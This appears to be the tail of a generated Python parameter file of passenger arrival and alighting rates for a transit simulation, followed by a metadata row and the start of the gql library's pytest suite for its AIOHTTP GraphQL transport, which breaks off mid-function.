(3.1875, 6.6, 5.23125, 2.775, 1.6124999999999998, 0.0, 4.6875, 6.449999999999999, 4.1625, 3.4875, 1.65, 0.0), # 30
(3.1951370284526854, 6.606943039772726, 5.230820969202898, 2.7749414624183006, 1.6124087322695035, 0.0, 4.683376259786773, 6.449634929078014, 4.162412193627451, 3.4872139794685983, 1.6517357599431814, 0.0), # 31
(3.202609175191816, 6.613794318181818, 5.229546014492753, 2.7747669934640515, 1.6121368794326238, 0.0, 4.677024758454107, 6.448547517730495, 4.162150490196078, 3.4863640096618354, 1.6534485795454545, 0.0), # 32
(3.2099197969948845, 6.620552982954545, 5.227443342391305, 2.774478308823529, 1.6116873670212764, 0.0, 4.66850768365817, 6.446749468085105, 4.161717463235294, 3.4849622282608697, 1.6551382457386363, 0.0), # 33
(3.217072250639386, 6.627218181818182, 5.224531159420289, 2.7740771241830067, 1.6110631205673758, 0.0, 4.657887223055139, 6.444252482269503, 4.16111568627451, 3.4830207729468596, 1.6568045454545455, 0.0), # 34
(3.224069892902813, 6.633789062499998, 5.220827672101449, 2.773565155228758, 1.6102670656028368, 0.0, 4.645225564301183, 6.441068262411347, 4.160347732843137, 3.480551781400966, 1.6584472656249996, 0.0), # 35
(3.23091608056266, 6.6402647727272734, 5.2163510869565215, 2.7729441176470586, 1.6093021276595745, 0.0, 4.630584895052474, 6.437208510638298, 4.159416176470589, 3.477567391304347, 1.6600661931818184, 0.0), # 36
(3.2376141703964194, 6.6466444602272725, 5.211119610507246, 2.7722157271241827, 1.6081712322695032, 0.0, 4.614027402965184, 6.432684929078013, 4.158323590686274, 3.474079740338164, 1.6616611150568181, 0.0), # 37
(3.2441675191815853, 6.652927272727272, 5.205151449275362, 2.7713816993464047, 1.6068773049645388, 0.0, 4.595615275695485, 6.427509219858155, 4.157072549019607, 3.4701009661835744, 1.663231818181818, 0.0), # 38
(3.250579483695652, 6.659112357954545, 5.198464809782608, 2.7704437499999996, 1.6054232712765955, 0.0, 4.57541070089955, 6.421693085106382, 4.155665625, 3.4656432065217384, 1.6647780894886361, 0.0), # 39
(3.2568534207161126, 6.6651988636363635, 5.191077898550724, 2.7694035947712417, 1.6038120567375882, 0.0, 4.5534758662335495, 6.415248226950353, 4.154105392156863, 3.4607185990338163, 1.6662997159090909, 0.0), # 40
(3.26299268702046, 6.671185937499998, 5.1830089221014495, 2.768262949346405, 1.6020465868794325, 0.0, 4.529872959353657, 6.40818634751773, 4.152394424019608, 3.455339281400966, 1.6677964843749995, 0.0), # 41
(3.269000639386189, 6.677072727272728, 5.174276086956522, 2.767023529411764, 1.6001297872340425, 0.0, 4.504664167916042, 6.40051914893617, 4.150535294117646, 3.4495173913043478, 1.669268181818182, 0.0), # 42
(3.2748806345907933, 6.682858380681817, 5.164897599637681, 2.7656870506535944, 1.5980645833333331, 0.0, 4.477911679576878, 6.3922583333333325, 4.148530575980392, 3.4432650664251203, 1.6707145951704543, 0.0), # 43
(3.2806360294117645, 6.688542045454545, 5.154891666666667, 2.7642552287581696, 1.5958539007092198, 0.0, 4.449677681992337, 6.383415602836879, 4.146382843137254, 3.4365944444444443, 1.6721355113636363, 0.0), # 44
(3.286270180626598, 6.694122869318181, 5.144276494565218, 2.7627297794117642, 1.593500664893617, 0.0, 4.420024362818591, 6.374002659574468, 4.144094669117647, 3.4295176630434785, 1.6735307173295453, 0.0), # 45
(3.291786445012788, 6.6996, 5.133070289855073, 2.761112418300653, 1.5910078014184397, 0.0, 4.389013909711811, 6.364031205673759, 4.14166862745098, 3.4220468599033818, 1.6749, 0.0), # 46
(3.297188179347826, 6.704972585227273, 5.12129125905797, 2.759404861111111, 1.588378235815603, 0.0, 4.356708510328169, 6.353512943262412, 4.139107291666666, 3.4141941727053133, 1.6762431463068181, 0.0), # 47
(3.3024787404092075, 6.710239772727273, 5.108957608695651, 2.757608823529411, 1.5856148936170211, 0.0, 4.323170352323839, 6.3424595744680845, 4.136413235294117, 3.4059717391304343, 1.6775599431818182, 0.0), # 48
(3.307661484974424, 6.715400710227271, 5.096087545289855, 2.75572602124183, 1.5827207003546098, 0.0, 4.288461623354989, 6.330882801418439, 4.133589031862745, 3.3973916968599034, 1.6788501775568176, 0.0), # 49
(3.312739769820972, 6.720454545454543, 5.082699275362319, 2.7537581699346405, 1.5796985815602835, 0.0, 4.252644511077794, 6.318794326241134, 4.130637254901961, 3.388466183574879, 1.6801136363636358, 0.0), # 50
(3.317716951726343, 6.725400426136363, 5.068811005434783, 2.7517069852941174, 1.5765514627659571, 0.0, 4.215781203148426, 6.306205851063829, 4.127560477941176, 3.3792073369565214, 1.6813501065340908, 0.0), # 51
(3.322596387468031, 6.730237499999999, 5.054440942028985, 2.7495741830065357, 1.573282269503546, 0.0, 4.177933887223055, 6.293129078014184, 4.124361274509804, 3.3696272946859898, 1.6825593749999999, 0.0), # 52
(3.3273814338235295, 6.7349649147727275, 5.039607291666666, 2.7473614787581697, 1.5698939273049646, 0.0, 4.139164750957854, 6.279575709219858, 4.121042218137255, 3.359738194444444, 1.6837412286931819, 0.0), # 53
(3.332075447570333, 6.739581818181817, 5.024328260869565, 2.745070588235294, 1.5663893617021276, 0.0, 4.099535982008995, 6.2655574468085105, 4.117605882352941, 3.3495521739130427, 1.6848954545454542, 0.0), # 54
(3.336681785485933, 6.744087357954545, 5.008622056159419, 2.7427032271241827, 1.5627714982269503, 0.0, 4.05910976803265, 6.251085992907801, 4.114054840686275, 3.3390813707729463, 1.6860218394886362, 0.0), # 55
(3.341203804347826, 6.74848068181818, 4.9925068840579705, 2.740261111111111, 1.5590432624113475, 0.0, 4.017948296684991, 6.23617304964539, 4.110391666666667, 3.328337922705314, 1.687120170454545, 0.0), # 56
(3.345644860933504, 6.752760937500001, 4.976000951086956, 2.7377459558823527, 1.5552075797872338, 0.0, 3.9761137556221886, 6.220830319148935, 4.106618933823529, 3.317333967391304, 1.6881902343750002, 0.0), # 57
(3.3500083120204605, 6.756927272727271, 4.959122463768115, 2.7351594771241827, 1.5512673758865245, 0.0, 3.9336683325004165, 6.205069503546098, 4.102739215686275, 3.3060816425120767, 1.6892318181818178, 0.0), # 58
(0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0), # 59
)
passenger_allighting_rate = (
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 0
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 1
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 2
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 3
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 4
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 5
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 6
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 7
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 8
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 9
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 10
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 11
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 12
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 13
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 14
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 15
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 16
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 17
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 18
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 19
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 20
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 21
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 22
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 23
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 24
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 25
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 26
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 27
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 28
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 29
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 30
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 31
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 32
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 33
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 34
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 35
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 36
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 37
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 38
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 39
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 40
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 41
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 42
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 43
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 44
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 45
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 46
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 47
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 48
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 49
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 50
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 51
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 52
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 53
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 54
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 55
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 56
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 57
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 58
(0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1, 0, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 0.16666666666666666, 1), # 59
)
"""
parameters for reproducibiliy. More information: https://numpy.org/doc/stable/reference/random/parallel.html
"""
#initial entropy
entropy = 258194110137029475889902652135037600173
#index for seed sequence child
child_seed_index = (
1, # 0
97, # 1
)
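
# Minimal reproducibility sketch (an illustrative addition, not part of the
# original generated file; assumes numpy is installed). Per the numpy
# parallel-random docs linked above, the recorded entropy plus a child's
# spawn key deterministically reconstruct that child's random stream —
# shown here for the second recorded index as an example.
from numpy.random import SeedSequence, default_rng

_child_seed = SeedSequence(entropy, spawn_key=(child_seed_index[1],))
_rng = default_rng(_child_seed)  # same stream on every run of this instance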
| 112.486567 | 215 | 0.727623 | 5,147 | 37,683 | 5.325044 | 0.217602 | 0.315236 | 0.249562 | 0.472855 | 0.333552 | 0.331728 | 0.330852 | 0.330342 | 0.330342 | 0.330342 | 0 | 0.817902 | 0.119789 | 37,683 | 334 | 216 | 112.823353 | 0.008411 | 0.032137 | 0 | 0.202532 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.015823 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ab02e8f59de35acb2de9b4e22d29b46d2514cadc | 32,368 | py | Python | tests/test_aiohttp.py | bollwyvl/gql | fe213c42f07ae14f1311fd5cdd453413a35156df | [
"MIT"
] | null | null | null | tests/test_aiohttp.py | bollwyvl/gql | fe213c42f07ae14f1311fd5cdd453413a35156df | [
"MIT"
] | null | null | null | tests/test_aiohttp.py | bollwyvl/gql | fe213c42f07ae14f1311fd5cdd453413a35156df | [
"MIT"
] | null | null | null | import io
import json
from typing import Mapping

import pytest

from gql import Client, gql
from gql.cli import get_parser, main
from gql.transport.exceptions import (
    TransportAlreadyConnected,
    TransportClosed,
    TransportProtocolError,
    TransportQueryError,
    TransportServerError,
)

from .conftest import TemporaryFile

query1_str = """
    query getContinents {
      continents {
        code
        name
      }
    }
"""

query1_server_answer_data = (
    '{"continents":['
    '{"code":"AF","name":"Africa"},{"code":"AN","name":"Antarctica"},'
    '{"code":"AS","name":"Asia"},{"code":"EU","name":"Europe"},'
    '{"code":"NA","name":"North America"},{"code":"OC","name":"Oceania"},'
    '{"code":"SA","name":"South America"}]}'
)

query1_server_answer = f'{{"data":{query1_server_answer_data}}}'

# Marking all tests in this file with the aiohttp marker
pytestmark = pytest.mark.aiohttp
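
# Illustrative aside, not part of the original test module: a module-level
# pytestmark lets this whole file be selected or excluded by marker from the
# command line (assuming "aiohttp" is registered in the project's pytest
# configuration), e.g.:
#
#   pytest -m aiohttp tests/          # run only the aiohttp-marked tests
#   pytest -m "not aiohttp" tests/    # skip them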
@pytest.mark.asyncio
async def test_aiohttp_query(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(
text=query1_server_answer,
content_type="application/json",
headers={"dummy": "test1234"},
)
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
async with Client(transport=transport) as session:
query = gql(query1_str)
# Execute query asynchronously
result = await session.execute(query)
continents = result["continents"]
africa = continents[0]
assert africa["code"] == "AF"
# Checking response headers are saved in the transport
assert hasattr(transport, "response_headers")
assert isinstance(transport.response_headers, Mapping)
assert transport.response_headers["dummy"] == "test1234"
@pytest.mark.asyncio
async def test_aiohttp_ignore_backend_content_type(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query1_server_answer, content_type="text/plain")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
async with Client(transport=transport) as session:
query = gql(query1_str)
result = await session.execute(query)
continents = result["continents"]
africa = continents[0]
assert africa["code"] == "AF"
@pytest.mark.asyncio
async def test_aiohttp_cookies(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
assert "COOKIE" in request.headers
assert "cookie1=val1" == request.headers["COOKIE"]
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, cookies={"cookie1": "val1"})
async with Client(transport=transport) as session:
query = gql(query1_str)
# Execute query asynchronously
result = await session.execute(query)
continents = result["continents"]
africa = continents[0]
assert africa["code"] == "AF"
@pytest.mark.asyncio
async def test_aiohttp_error_code_401(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
# Will generate http error code 401
return web.Response(
text='{"error":"Unauthorized","message":"401 Client Error: Unauthorized"}',
content_type="application/json",
status=401,
)
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url)
async with Client(transport=transport) as session:
query = gql(query1_str)
with pytest.raises(TransportServerError) as exc_info:
await session.execute(query)
assert "401, message='Unauthorized'" in str(exc_info.value)
@pytest.mark.asyncio
async def test_aiohttp_error_code_500(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
# Will generate http error code 500
raise Exception("Server error")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url)
async with Client(transport=transport) as session:
query = gql(query1_str)
with pytest.raises(TransportServerError) as exc_info:
await session.execute(query)
assert "500, message='Internal Server Error'" in str(exc_info.value)
query1_server_error_answer = '{"errors": ["Error 1", "Error 2"]}'
@pytest.mark.asyncio
async def test_aiohttp_error_code(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(
text=query1_server_error_answer, content_type="application/json"
)
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url)
async with Client(transport=transport) as session:
query = gql(query1_str)
with pytest.raises(TransportQueryError):
await session.execute(query)
invalid_protocol_responses = [
{
"response": "{}",
"expected_exception": (
"Server did not return a GraphQL result: "
'No "data" or "errors" keys in answer: {}'
),
},
{
"response": "qlsjfqsdlkj",
"expected_exception": (
"Server did not return a GraphQL result: Not a JSON answer: qlsjfqsdlkj"
),
},
{
"response": '{"not_data_or_errors": 35}',
"expected_exception": (
"Server did not return a GraphQL result: "
'No "data" or "errors" keys in answer: {"not_data_or_errors": 35}'
),
},
]
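# The three cases above exercise the response-shape rule the transport
# enforces: a GraphQL-over-HTTP answer must be valid JSON and contain a
# "data" and/or "errors" key. A minimal sketch of that rule, for
# illustration only (this is not the transport's actual implementation):
def _looks_like_graphql_result(text):
    try:
        answer = json.loads(text)
    except ValueError:
        # Corresponds to the "Not a JSON answer" case above
        return False
    # At least one of the two protocol keys must be present
    return isinstance(answer, dict) and ("data" in answer or "errors" in answer)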
@pytest.mark.asyncio
@pytest.mark.parametrize("param", invalid_protocol_responses)
async def test_aiohttp_invalid_protocol(event_loop, aiohttp_server, param):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
response = param["response"]
async def handler(request):
return web.Response(text=response, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url)
async with Client(transport=transport) as session:
query = gql(query1_str)
with pytest.raises(TransportProtocolError) as exc_info:
await session.execute(query)
assert param["expected_exception"] in str(exc_info.value)
@pytest.mark.asyncio
async def test_aiohttp_subscribe_not_supported(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text="does not matter", content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url)
async with Client(transport=transport) as session:
query = gql(query1_str)
with pytest.raises(NotImplementedError):
async for result in session.subscribe(query):
pass
@pytest.mark.asyncio
async def test_aiohttp_cannot_connect_twice(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
async with Client(transport=transport) as session:
with pytest.raises(TransportAlreadyConnected):
await session.transport.connect()
@pytest.mark.asyncio
async def test_aiohttp_cannot_execute_if_not_connected(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
query = gql(query1_str)
with pytest.raises(TransportClosed):
await transport.execute(query)
@pytest.mark.asyncio
async def test_aiohttp_extra_args(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
# passing extra arguments to aiohttp.ClientSession
from aiohttp import DummyCookieJar
jar = DummyCookieJar()
transport = AIOHTTPTransport(
url=url, timeout=10, client_session_args={"version": "1.1", "cookie_jar": jar}
)
async with Client(transport=transport) as session:
query = gql(query1_str)
# Passing extra arguments to the post method of aiohttp
result = await session.execute(query, extra_args={"allow_redirects": False})
continents = result["continents"]
africa = continents[0]
assert africa["code"] == "AF"
query2_str = """
query getEurope ($code: ID!) {
continent (code: $code) {
name
}
}
"""
query2_server_answer = '{"data": {"continent": {"name": "Europe"}}}'
@pytest.mark.asyncio
async def test_aiohttp_query_variable_values(event_loop, aiohttp_server):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query2_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
async with Client(transport=transport) as session:
params = {"code": "EU"}
query = gql(query2_str)
# Execute query asynchronously
result = await session.execute(
query, variable_values=params, operation_name="getEurope"
)
continent = result["continent"]
assert continent["name"] == "Europe"
@pytest.mark.asyncio
async def test_aiohttp_query_variable_values_fix_issue_292(event_loop, aiohttp_server):
"""Allow to specify variable_values without keyword.
See https://github.com/graphql-python/gql/issues/292"""
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query2_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
transport = AIOHTTPTransport(url=url, timeout=10)
async with Client(transport=transport) as session:
params = {"code": "EU"}
query = gql(query2_str)
# Execute query asynchronously
result = await session.execute(query, params, operation_name="getEurope")
continent = result["continent"]
assert continent["name"] == "Europe"
@pytest.mark.asyncio
async def test_aiohttp_execute_running_in_thread(
event_loop, aiohttp_server, run_sync_test
):
from aiohttp import web
from gql.transport.aiohttp import AIOHTTPTransport
async def handler(request):
return web.Response(text=query1_server_answer, content_type="application/json")
app = web.Application()
app.router.add_route("POST", "/", handler)
server = await aiohttp_server(app)
url = server.make_url("/")
def test_code():
transport = AIOHTTPTransport(url=url)
client = Client(transport=transport)
query = gql(query1_str)
client.execute(query)
await run_sync_test(event_loop, server, test_code)
@pytest.mark.asyncio
async def test_aiohttp_subscribe_running_in_thread(
event_loop, aiohttp_server, run_sync_test
):
from aiohttp import web
